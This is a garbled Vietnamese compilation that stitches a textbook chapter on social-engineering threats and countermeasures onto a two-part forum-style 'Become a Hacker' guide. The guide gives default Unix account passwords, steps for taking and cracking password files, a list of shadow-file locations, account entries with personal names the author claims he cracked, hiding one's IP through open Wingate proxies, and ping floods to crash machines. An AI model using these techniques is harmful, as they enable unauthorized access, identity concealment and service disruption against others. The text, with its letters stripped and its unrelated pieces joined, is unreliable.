S pht trin mnh m ca internet, nhu cu kt ni my tnh phc v cho cng vic, p ng cc yu cu thng tin t ng c outsite v inside. S kt ni ny l c hi gip cc hacker tip cn vi nhn vin. Cc hot ng tn cng nh email, pop-up windows, instant message s dng trojan, worm, virusgy thit hi v ph hy ti nguyn my tnh. Social engineer tip cn vi nhn vin v thuyt phc h cung cp thng tin, thng qua nhng mu mo, hn l lm nhim malware cho my tnh thng qua tn cng trc tip. Mt cuc tn cng Social engineering c th gip cho hacker thu thp c nhng thng tin cn thit, chun b cho mt cuc tn cng mnh m khc sau . V th, phi c li khuyn v nhng khuyn co cho nhn vin, l lm th no nhn din v trnh cc cuc tn cng Social engineering trc tuyn. Cc mi e da t Email (Email Threats): Nhiu nhn vin nhn c hng chc hng trm mail mi ngy, t c cc hot ng kinh doanh, v t h thng email ring. Khi lng email nhiu c th lm cho vic kim tra email tr nn kh khn hn, v mc cnh gic i vi email mo danh cng gim i. chnh l c hi cho hacker mo danh ngi gi l mt ngi quen d d nn nhn cung cp nhng thng tin cn thit. Mt v d ca tn cng kiu ny l gi email n cc nhn vin ni rng ng ch mun tt c lch ngh ca nhn vin t chc mt cuc hp. Ch n gin l lm cho email gi n nhn vin bt ngun t ng ch. Cc nhn vin v khng thn trng nn cung cp thng tin yu cu mt cch khng ngn ngi. S hiu bit v lch trnh ngh ca nhn vin c th khng l mi e da g n bo mt, nhng n c ngh vi hacker, bit c khi no nhn vin vng mt. Hacker sau c th gi dng nhn vin vng mt, v c th gim thiu kh nng b pht hin. V la o lin quan n email, thng mc tiu l ngn hng, cng ty th tn dng, hoc t chc lin quan ti chnh. Email yu cu ngi nhn xc nhn thng tin ngn hng, hoc t li email, m s PIN. Ngi dng click vo mt ng link trong email, v c dn n mt trang web gi mo. Hacker nm bt thng tin c li cho mc ch ti chnh hoc chun b cho mt cuc tn cng khc. Trong cc cuc tn cng, con mi l nhng ngi dng bnh thng, h ch bit cung cp nhng thng tin m hacker yu cu. V vy, pha cn phng chng l cc cng ty cung cp dch v, lm sao cho hacker khng th gi mo. Mt v d la o na ca k thut ny l email sau y:

Nhn k hn chng ta c th nhn thy 2 s khc bit: Dng ch trong dng link trn ch ra l trang web ny bo mt, s dng https, mc d link tht s ca trang web s dng http. Tn cng ty trong mail l Contoso, nhng link tht s th tn cng ty gi l Comtoso Cc ng dng pop-up v hp hi thoi( Pop-Up Applications and Dialog Boxes): Khng thc t cc nhn vin s dng internet khng ch cho mc ch lm vic ca cng ty. Hu ht nhn vin duyt Web cho cc l do c nhn, chng hn nh mua sm hoc nghin cu trc tuyn. Thng qua trnh duyt c nhn ca nhn vin h thng my tnh cng ty c th tip xc vi cc hot ng ca Social Engineer. Mc d iu ny c th khng l mc tiu c th ca hacker, h s s dng cc nhn vin trong mt n lc t c quyn truy xut vo ti nguyn cng ty. Mt trong nhng mc ch ph bin l nhng mt mail engine vo mi trng my tnh cng ty thng qua hacker c th bt u phising hoc cc tn cng khc vo email ca c nhn hay ca cng ty. Hai phng thc thng thng li ko user click vo mt nt bm bn trong mt hp hi thoi l a ra mt cnh bo ca vn , chng hn nh hin th mt thng bo li ng dng hoc h thng, bng cch ngh cung cp thm dch v v d, mt download min ph cc ng dng tng tc my tnh. Vi nhng nhn vin c kinh nghim (nhn vin IT chng hn) khng d b mc la bi kiu la bp ny. Nhng vi cc user thiu kinh nghim th cc phng thc ny c th e da v la c h. Bo v user t cc ng dng pop-up Social Engineering phn ln l mt chc nng ca s thc. trnh vn ny, bn c th thit lp cu hnh trnh duyt mc nh s ngn chn pop-up v download t ng, nhng mt vi pop-up c th vt qua thit lp ny. S hiu qu hn m bo rng ngi dng nhn thc c rng h khng nn bm vo ca s pop-up, trc khi c s kin ca nhn vin phng IT. Instant Mesaging C mt s mi e da tim tng ca IM khi n c hacker nhm n. u tin l tnh cht khng chnh thc ca IM. Tnh tn gu ca IM, km theo l la chn cho mnh mt ci tn gi mo (nickname), ngha l s khng hon ton r rng khi bn ang ni chuyn vi mt ngi m bn tin rng bn quen bit. Hnh minh ha di y ch ra spoofing lm vic nh th no, cho c e-mail v IM:

Hacker (mu ) gi mo user bit v gi mt bn tin e-mail hay IM m ngi nhn s cho rng n n t mt ngi m h bit. S quen bit lm gim nh s phng th ca user, v th h c nhiu kh nng click vo mt lin kt hoc m tp tin nh km t mt ai m h bit hoc h ngh l h bit.

7.2.

Telephone-Based Threats

in thoi l mi trng m ngi ta t quan tm n vic bo mt, cng t c hacker tn cng ph hng h thng in thoi. Nhng s dng in thoi phc v cho mc ch tn cng mng khc th khng phi khng c. Gi in thoi n nn, thuyt phc h cung cp thng tin bng mt kch bn tnh hung gi c cc hacker vit trc, l chnh mi e da ln nht ca k thut tn cng Social engineering s dng in thoi.

Khng dng li , VoIP ang dn dn pht trin, ngy cng c nhiu doanh nghip s dng VoIP. Vic tn cng vo mng VoIP nghe ln cuc gi l iu m cc hacker ang tin ti. Vic nghe ln cuc gi trc y ch phc v cho t chc an ninh, phng chng ti phm. Nhng n b cc hacker li dng nghe ln nhng thng tin bn tho ca cc v gim c.

7.3.

Waste Management Threats

Dumpster diving l mt hot ng c gi tr cho hacker. Giy t vt i c th cha thng tin mang li li ch tc thi cho hacker, chng hn nh user ID v s ti khon b i, hoc cc thng tin nn nh cc biu t chc v danh sch in thoi. Cc loi thng tin ny l v gi i vi hacker social engineering, bi v n lm cho hn ta c v ng tin khi bt u cuc tn cng. Phng tin lu gi in t thm ch cn hu ch hn cho hacker. Nu mt cng ty, khng c cc quy tc qun l cht thi bao gm s dng cc phng tin thng tin d tha, th c th tm thy tt c cc loi thng tin trn a cng, CD, DVD khng cn s dng. Nhn vin phi hiu c y s tc ng ca vic nm giy thi hoc phng tin lu tr in t vo thng rc. Sau khi di chuyn rc thi ra ngoi cng ty, th tnh s hu n c th tr thnh khng r rng v php lut. Dumpster diving c th khng c coi l bt hp php trong mi hon cnh, v th phi a ra li khuyn v x l rc thi.

Lun lun ct thnh ming nh giy vn v xa i hoc ph hy cc phng tin c t tnh. Nu c loi cht thi qu ln hoc kh t vo my hy, chng hn nh nin gim in thoi, hoc n c k thut vt qu kh nng ca user hy n, th phi pht trin mt giao thc cho vic vt b. Nn t cc thng rc trong vng an ton m khng tip cn vi cng cng.

Bn cnh qun l cht thi bn ngoi cng cn phi qun l cht thi bn trong. Chnh sch bo mt thng khng ch vn ny, bi v n thng c gi nh rng bt c ai c php vo cng ty phi l ng tin cy. R rng, iu ny khng phi lc no cng ng. Mt trong nhng bin php c hiu qu nht qun l giy thi l c t ca vic phn loi d liu. Bn xc nh loi giy khc nhau da trn cc thng tin v ch nh cch thc nhn vin qun l s vt b ca h. V d c th phn thnh cc loi: B mt cng ty, ring t, vn phng, cng cng

7.4.

Personal Approaches

Cch r nht v n gin nht cho hacker ly thng tin l hi trc tip. Cch tip cn ny c v th l v r rng, nhng n nn tng ca cc th on nh la b mt. C 4 cch tip cn chnh minh chng thnh cng ca social engineer: S e da: cch tip cn ny c th bao gm s mo danh mt ngi c thm quyn p buc mc tiu lm theo yu cu. S thuyt phc: hnh thc thng thng ca s thuyt phc gm c nnh ht hay bng cch ni rng mnh quen ton nhng nhn vt ni ting.

S mn m: cch tip cn ny l mt th on di hi, trong ngi cp di hoc ng nghip xy dng mt mi quan h ly lng tin, thm ch, thng tin t mc tiu. S tr gip: vi cch tip cn ny, hacker t ra sn sng gip mc tiu. S tr gip ny cui cng i hi mc tiu tit l ra thng tin c nhn gip hacker nh cp nhn dng ca mc tiu. Bo v user chng li nhng loi ca tip cn c nhn th rt kh khn. N ph thuc kh nhiu vo nhn thc ca nhn vin. Vic pht trin mt mi trng lm vic cng ng tin cy s lm gim mc thnh cng ca hacker. Thng xuyn t chc nhng chng trnh tp hun v mc ri ro ca an ninh cho nhn vin l cch tt nht gip h nng cao nhn thc, chng li kiu tn cng ny.

7.5.

Reverse Social Engineering

L mt hnh thc cao hn social engineering, gii quyt cc kh khn ph bin ca social engineering bnh thng. Hnh thc ny c th m t l mt user hp php ca h thng hi hacker cc cu hi cho thng tin. Trong RSE, hacker c cho l c v tr cao hn user hp php, ngi thc s l mc tiu. thc hin mt tn cng RSE, k tn cng phi c s hiu bit v h thng v lun lun phi c quyn truy xut trc c cp cho anh ta, thng l do social engineering bnh thng tin hnh. Tn cng RSE tiu biu bao gm 3 phn chnh: s ph hoi, s qung co, s gip . Sau khi t quyn truy xut bng cc phng tin khc, hacker ph hoi workstation bng cch lm h station, hoc lm cho n c v l h hng. Vi s phong ph cc thng bo li, chuyn cc tham s/ty chn, hoc chng trnh gi mo c th thc hin vic ph hoi. Ngi s dng thy cc trc trc v sau tm kim s gip . l ngi c user gi ti, k tn cng phi qung b l hn ta c kh nng sa c li. S qung b c th bao gm t cc th kinh doanh gi mo xung quanh cc vn phng hay thm ch cung cp s in thoi gi n trong thng bo li.

8. Bin php i ph Social Engineering


xc nh c phng php i ph vi Social Engineering l iu rt quan trng trong cc k thut phng th v tn cng. N c lin quan n vn v x hi nn vic phng chng n c cht rc ri v cch t cch ca con ngi. C mt s cch lm iu ny. Chnh sch (policy) an ninh trong cng ty quyt nh vn an ton ca h thng. Bn cn t ra nhng quy nh, gii hn quyn truy cp cho cc nhn vin trong cng ty. Hun luyn tt cho nhn vin v an ninh l iu rt cn thit. Khi nhn vin ca bn hiu ra cc vn an ninh, h s t trch cc ri ro trc khi c s can thit ca phng an ninh. Vn v con ngi cng khng km quan trng. V k thut tn cng ny ch yu lin quan n t tng con ngi. S l l ca nhn vin, s mt lng tin ca nhn vin cng l nguy c mt an ton cho h thng.

Xy dng mt framework qun l an ninh: Phi xc nh tp hp cc mc ch ca an ninh social engineering v i ng nhn vin nhng ngi chu trch nhim cho vic phn phi nhng mc ch ny. nh gi ri ro: Cc mi e da khng th hin cng mt mc ri ro cho cc cng ty khc nhau. Ta phi xem xt li mi mt mi e da social engineering v hp l ha mi nguy him trong t chc. Social engineering trong chnh sch an ninh: Pht trin mt vn bn thit lp cc chnh sch v th tc quy nh nhn vin x tr tnh hung m c th l tn cng social engineering. Bc ny gi nh l chnh sch bo mt c, bn ngoi nhng mi e da ca social engineering. Nu hin ti khng c chnh sch bo mt, th cn phi pht trin chng.

9. Tng Kt
Bn cn nm vng cc ni dung sau y trc khi hc tip chng sau:

Social engineering l k thut x hi, dng mi quan h con ngi thu thp tin cn thit phc v cho nhng cuc tn cng pha sau. Quan trng nht trong k thut ny l da vo im yu ca con ngi. Cc bc thc hin mt cuc tn cng Social engineering l: Thu thp thng tin, chn mc tiu, tn cng. Cc kiu tn cng ph bin c th k n nh: Insider Attack, Indentify Theft, Online Scam, Phising V cui cng l phng chng li kiu tn cng ny, khng c cch no hiu qu bng cch gio dc cho nhn vin ca bn nhng th on la o h t cnh gic.

///////////////

Become a hacker 1
Nhng hiu bit c bn nht tr thnh Hacker Phn 1 (Ton b bi vit ny ly bn www.hvanews.net) Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ? Nhng cc bn qun mt mt iu l cc bn cn phI c kin thc mt cch tng qut , hiu cc thut ng m nhng ngi rnh v mng hay s dng . Ring ti th cha tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt s kin thc c bn , mun chia s cho tt c cc bn , nhm cng cc bn hc hi . Ti s khng chu trch nhim nu cc bn dng n quy ph ngI khc . Cc bn c th copy hoc post trong cc trang Web khc nhng hy in tin tc gi dI bi , tn trng bi vit ny cng chnh l tn trng ti v cng sc ca ti , ng thI cng tn trng chnh bn thn cc bn . Trong ny ti cng c chn thm mt s cch hack , ***** v v d cn bn , cc bn c th ng dng th v nghin cu c n hiu thm , r khi bt gp mt t m

cc bn khng hiu th hy c bi ny bit , trong ny ti c s dng mt s ca bi vit m ti thy rt hay t trang Web ca HVA , v cc trang Web khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi l vn chnh . ================================================== = = 1 . ) Ta cn nhng g bt u ? C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l cc bn hy dng HH Window 9X , rI n cc ci khc mnh hn l Linux hoc Unix , dI y l nhng ci bn cn c : + Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .) + Mt ci trang Web tt ( HVA chng hn hi`hi` greenbiggrin.gif greenbiggrin.gif ) + Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l l Gozzila ) + Mt cng c chat tt ( mIRC ,Yahoo Mass ..) + Telnet ( hoc nhng ci tng t nh nmap ) + Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phI c mt cht kin thc v lp trnh ( C , C++ , Visual Basic , Pert ..) 2 . ) Th no l mt a ch IP ? _ a ch IP c chia thnh 4 s gii hn t 0 255. Mi s c lu bi 1 byte > !P c kicks thc l 4byte, c chia thnh cc lp a ch. C 3 lp l A, B, v C. Nu lp A, ta s c th c 16 triu i ch, lp B c 65536 a ch. V d: lp B vi 132.25,chng ta c tt c cc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cc a ch lp A ll s hu ca cc cng ty hay ca t chc. Mt ISP thng s hu mt vi a ch lp B hoc C. V d: Nu a ch IP ca bn l 132.25.23.24 th bn c th xc nh ISP ca bn l ai. ( c IP l 132.25.x.) _ IP l t vit tt ca Internet Protocol, trn Internet th a ch IP ca mI ngi l duy nht v n s I din cho chnh ngI , a ch IP c s dng bi cc my tnh khc nhau nhn bit cc my tnh kt ni gia chng. y l l do ti sao bn li b IRC cm, v l cch ngi ta tm ra IP ca bn. a ch IP c th d dng pht hin ra, ngi ta c th ly c qua cc cch sau : + bn lt qua mt trang web, IP ca bn b ghi li + trn IRC, bt k ai cng c th c IP ca bn + trn ICQ, mi ngi c th bit IP ca bn, thm ch bn chn do not show ip ngi ta vn ly c n + nu bn kt ni vi mt ai , h c th g systat n , v bit c ai ang kt ni n h + nu ai gi cho bn mt email vi mt on m java tm IP, h cng c th tm c IP ca bn ( Ti liu ca HVA ) 3 . ) Lm th no bit c a ch IP ca mnh ?

Run nh lnh winipcfg ._ Trong Window : vo Start _ Trong mIRC : kt nI n my ch sau nh lnh /dns _ Thng qua mt s trang Web c hin th IP . 4 . ) IP Spoofing l g ? _ Mt s IP c mc ch xc nh mt thit b duy nht trn th gii. V vy trn mng mt my ch c th cho php mt thit b khc trao i d liu qua li m khng cn kim tra my ch. Tuy nhin c th thay i IP ca bn, ngha l bn c th gi mt thng tin gi n mt my khc m my s tin rng thng tin nhn c xut pht t mt my no (tt nhin l khng phi my ca bn). Bn c th vt qua my ch m khng cn phi c quyn iu khin my ch . iu tr ngi l ch nhng thng tin phn hi t my ch s c gi n thit b c IP m chng ta gi mo. V vy c th bn s khng c c s phn hi nhng thng tin m mnh mong mun. C l iu duy nht m spoof IP c hiu qu l khi bn cn vt qua firewall, trm account v cn du thng tin c nhn! ( Ti liu ca HVA ) 5 . ) Trojan / worm / virus / logicbomb l ci g ? _ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vo my ca ngI khc n cp nhng ti liu trn my gI v cho ch nhn ca n , Ci m n n cp c th l mt khu , accourt , hay cookie . tu theo mun ca ngI ci n . _ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit c ci ( hoc ly lan t my khc ) ln my ca nn nhn v thc hin nhng yu cu ca m , a s virut c s dng ph hoI d liu hoc ph hoI my tnh . _ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly lan khp bn trong mng .Cng ging nh Virut , n cng c th ph hoI d liu , hoc n c th ph hoI bn trong mng , nhiu khi cn lm down c mang . _ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mt a ch , lm ngp lt h thng , tt nghn ng truyn ( trn server ) hoc dng lm cng c khng b I phng ( bom Mail ) . 6 . ) PGP l g ? _ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng s m ho cha kho cng cng bo v nhng h s Email v d liu , l dng m ho an ton cao s dng phn mm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khc . 7 . ) Proxy l g ? _Proxy cung cp cho ngi s dng truy xut internet vi nhng host n. Nhng proxy server phc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dung s qua trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc chuyn tip n nhng

yu cu t clientn server, cng nh p ng nhng yu cu ca server n client. V vy proxy server ging cu ni trung gian gia server v client . _ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vi dual host homed cn phi login vo host trc khi s dng dch v no trn internet. iu ny thng khng tin li, v mt s ngi tr nn tht vng khi h c cm gic thng qua firewall, vi proxy n gii quyt c vn ny. Tt nhin n cn c nhng giao thc mi nhng ni chung n cng kh tin li cho user. Bi v proxy cho php user truy xut nhng dch v trn internet t h thng c nhn ca h, v vy n khng cho php packet i trc tip gia h thng s dng v internet. ng i l ging tip thng qua dual homed host hoc thng qua s kt hp gia bastion host v screening rounter. ( Bi vit ca Z3RON3 ti liu ca HVA ) 8 . ) Unix l g ? _ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht , v thn thit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH ny khng th thiu i vI bn . N c s dng h tr cho lp trnh ngn ng C . 9 . ) Telnet l g ? _ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng ( port ) . MI my tnh hoc my ch ( server ) u c cng , sau y l mt s cng thng dng : + Port 21: FTP + Port 23: Telnet + Port 25: SMTP (Mail) + Port 37: Time + Port 43: Whois _ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 . 10 . ) Lm th no bit mnh Telnet n h thng Unix ? _ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc : Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix. Please log in .) By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn s thy c mt mt khu , bn hy th nhp Default Password th theo bng sau : Account-Default Password Root Root Sys Sys / System / Bin Bin -Sys / Bin MountfsyM ountfsys Nuuc Anon Anon Anon

User -User GamesG ames Install Install Demo Demo Guest- Guest 11 . ) shell account l ci g ? _ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI ( terminal ) m vI n bn c th nh lnh n mt my tnh ang chy Unix , Shell l chng trnh c nhim v dch nhng k t ca bn gi n rI a vo thc hin lnh ca chng trnh Unix . VI mt shell account chnh xc bn c th s dng c mt trm lm vic mnh hn nhiu so vI ci m bn c th tng tng n c . Bn c th ly c shell account min ph tI trang Web www.freeshell.com tuy nhin bn s khng s dng c telnet cho n khi bn tr tin cho n . 12 . ) Lm cch no bn c th Crack Unix account passwords ? _ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI , cc bn c th crack c chng nu cc bn may mn , cn khng th cc bn c tham kho . _ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khch hng hoc mt ngI khch gh thm , nu may mn bn s ly c mt khu c ct du trong nhng h thng chun nh : /etc/passwd mi hng trong mt h s passwd c mt ti khon khc nhau , n ging nh hng ny : userid:password:userid#:groupid#:GECOS field:home dir:shell trong : + userid = the user id name : tn ng nhp : c th l mt tn hoc mt s . + password : mt m . Dng lm g hn cc bn cng bit rI . + userid# : l mt s duy nht c thng bo cho ngI ng k khi h ng k mI ln u tin . + groupid# : tng t nh userid# , nhng n c dng cho nhng ngI ang trong nhm no ( nh nhm Hunter Buq ca HVA chng hn ) + GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y , s in thoi , a ch v.v. . y cng l ngun tt ta d dng ***** mt mt khu . + home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm ( ging nh mc History trong IE vy ) + Shell : y l tn ca shell m n t ng bt u khi ta login . _ Hy ly file password , ly file text m ho v , sau bn dng chng trnh CrackerJack hoc John the Ripper ***** . _ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may mn bn c th ***** c v hu ht by gi h ct rt k , hy c tip bn s thy kh khn ch no .

13 . ) shadowed password l ci g ? _ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt mt khu , th ngI khc ch thy c trnh n ca n ( nh k hiu X hoc * ) . Ci ny thng bo cho bn bit l file passwd c ct gi ni khc , ni m mt ngI s dng bnh thng khng th n c . Khng l ta nh b tay , d nhin l I vI mt hacker th khng ri , ta khng n c trc tip file shadowed password th ta hy tm file sao lu ca n , l file Unshadowed . Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI ln lt nhng ng dn sau : CODE AIX 3 /etc/security/passwd ! or /tcb/auth/files/ / A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/ / SunOS4.1+c2 /etc/security/passwd.adjunct =##username SunOS 5.0 /etc/shadow maps/tables/whatever > System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb =20 Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo h thng tht s bn mun ly rI ln theo ng dn pha sau du /u tin . V cuI cng l nhng account passwd m ti tng crack c , c th by gi n ht hiu lc rI : CODE arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh

arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc bn hy tm hiu thng tin c c t chng xem . Ht phn 1

///////////////

Become a Hacker 2
Nhng hiu bit c bn nht tr thnh Hacker Phn 2 14 . ) Vitual port l g ? _ Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(Tranmission Control Protocol) v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows c th chy nhiu chng trnh 1 lc, mi chng trnh ny c 1 cng ring dng truyn v nhn d liu. V d 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3 server, etc, nhng dch v ny u uc chy trn 1 IP address l 127.0.0.1, khi mt gi tin uc gi n lm th no my tnh ca chng ta phn bit c gi tin ny i vo dch v no WebServer hay FTP server hay SM! TP? Chnh v th Port xut hin. Mi dch v c 1 s port mc nh, v d FTP c port mc nh l 21, web service c port mc nh l 80, POP3 l 110, SMTP l 25 vn vn. Ngi qun tr mng c th thay i s port mc nh ny, nu bn ko bit s port trn mt my ch, bn ko th kt ni vo dch v c. Chc bn tng nghe ni n PORT MAPPING nhng c l cha bit n l g v chc nng th no. Port mapping thc ra n gin ch l qu trnh chuyn i s port mc nh ca mt dch v no n 1 s khc. V d Port mc nh ca WebServer l 80, nhng thnh thong c l bn vn thy http://www.xxx.com:8080 , 8080 y chnh l s port ca host xxx nhng uc ngui qun tr ca host ny map t 80 thnh 8080. ( Ti liu ca HVA ) 15 . ) DNS l g ? _ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53, c ngha l nu bn mun kt ni vo my ch , bn phi kt ni n cng s 53. My ch chy DNS chuyn hostname bng cc ch ci thnh cc ch s tng ng v ngc li. V d: 127.0.0.1 > localhost v localhost > 127.0.0.1 . ( Ti liu ca HVA )

16 . ) i iu v Wingate : _ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra. Th d: bn c th chia s 1 modem vi 2 hoc nhiu my . WinGate dng vi nhiu proxy khc nhau c th che giu bn . _ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hy telnet trn cng 23 trn my ch chy WinGate telnet proxy v bn s c du nhc WinGate > . Ti du nhc ny bn nh vo tn server, cng mt khong trng v cng bn mun kt ni vo. VD : CODE telnet wingate.net WinGate > victim.com 23 ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny IP trn my m victim chp c ca ta l IP ca my ch cha Wingate proxy . _ Lm sao tm Wingate ? + Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mt trang tm kim cable modem. Tm kim cable modems v nhiu ngi dng cable modems c WinGate h c th chia s ng truyn rng ca n cable modems cho nhng my khc trong cng mt nh . Hoc bn c th dng Port hay Domain scanners v scan Port 1080 . + tm IP ng (IP thay i mi ln user kt ni vo internet) ca WinGates bn c th dng Domscan hoc cc chng trnh qut khc . Nu dng Domscan bn hy nhp khong IP bt k vo box u tin v s 23 vo box th 2 . Khi c kt qu , bn hy th ln lt telnet n cc a ch IP tm c ( hng dn trn ), nu n xut hin du Wingate > th bn tm ng my ang s dng Wingate rI . + Theo kinh nghim ca ti th bn hy down wingatescanner v m si , n c rt nhiu trn mng . 17 . ) i iu v Traceroute : _ Traceroute l mt chng trnh cho php bn xc nh c ng i ca cc gi packets t my bn n h thng ch trn mng Internet. _ bn hy xem VD sau : CODE C:\windows > tracert 203.94.12.54 Tracing route to 203.94.12.54 over a maximum of 30 hops 1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms 2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms 3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms 4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms 5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms 7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms 8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms

9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms 11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms Ti cn bit ng i t my ti n mt host trn mng Internet c a ch ip l 203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi packets t my ti mun n c 203.94.12.54 phi i qua 13 hops(mc xch) trn mng. y l ng i ca cc gi packets . _ Bn hy xem VD tip theo : CODE host2 # traceroute xyz.com traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets 1 isp.net (202.xy.34.12) 20ms 10ms 10ms 2 xyz.com (202.xx.12.34) 130ms 130ms 130ms + Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng ny cn cho chng ta bit thm gi tr TTL<=30 v kch thc ca datagram l 40 bytes(20-bytes IP Header + 8bytes UDP Header + 12-bytes user data). + Dng th 2 cho bit router u tin nhn c datagram l 202.xy.34.12, gi tr ca TTL khi gi n router ny l 1. Router ny s gi tr li cho chng trnh traceroute mt ICMP message error Time Exceeded. Traceroute s gi tip mt datagram n h thng ch. + Dng th 3, xyz.com(202.xx.12.34) nhn c datagram c TTL=1(router th nht gim mt trc TTL=2-1=1). Tuy nhin, xyz.com khng phi l mt router, n s gi tr li cho traceroute mt ICMP error message Port Unreachable. Khi nhn c ICMP message ny, traceroute s bit c n c h thng ch xyz.com v kt thc nhim v ti y. + Trong trng hp router khng tr li sau 5 giy, traceroute s in ra mt du sao *(khng bit) v tip tc gi datagram khc n host ch! _Ch : Trong windows: tracert hostname Trong unix: traceroute hostname ( Ti liu ca viethacker.net ) 18 . ) Ping v cch s dng : _ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn on mng. Tiu s ca t ping nh sau: Ping l ting ng vang ra khi 1 tu ngm mun bit c 1 vt th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s va vo vt th v ting vang li s l pong vy th tu ngm s bit l c g gn mnh. _Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn. Lnh Ping gi mt gi ICMP (Internet Control Message Protocol) n host, nu host pong li c ngha l host tn ti (hoc l c th vi ti oc). Ping cng c th gip chng ta bit c lung thi gian mt gi tin (data packet) i t my tnh ca mnh n 1 host no .

_Ping tht d dng, ch cn m MS-DOS, v g ping a_ch_ip, mc nh s ping 4 ln, nhng bn cng c th g CODE ping ip.address -t Cch ny s lm my ping mi. thay i kch thc ping lm nh sau: CODE ping -l (size) a_ch_ip Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt bao lu gi tin ri xem xem sau bao lu gi tin quay tr li, cch ny xc nh c tc ca kt ni, v thi gian cn mt gi tin i v quay tr li v chia bn (gi l trip time). Ping cng c th c dng lm chm i hoc v h thng bng lt ping. Windows 98 treo sau mt pht lt ping (B m ca kt ni b trn c qua nhiu kt ni, nn Windows quyt nh cho n i ngh mt cht). Mt cuc tn cng ping flood s chim rt nhiu bng thng ca bn, v bn phi c bng thng ln hn i phng ( tr khi i phng l mt my chy Windows 98 v bn c mt modem trung bnh, bng cch bn s h gc i phng sau xp x mt pht lt ping). Lt Ping khng hiu qu lm i vi nhng i phng mnh hn mt cht. tr khi bn c nhiu ng v bn kim sot mt 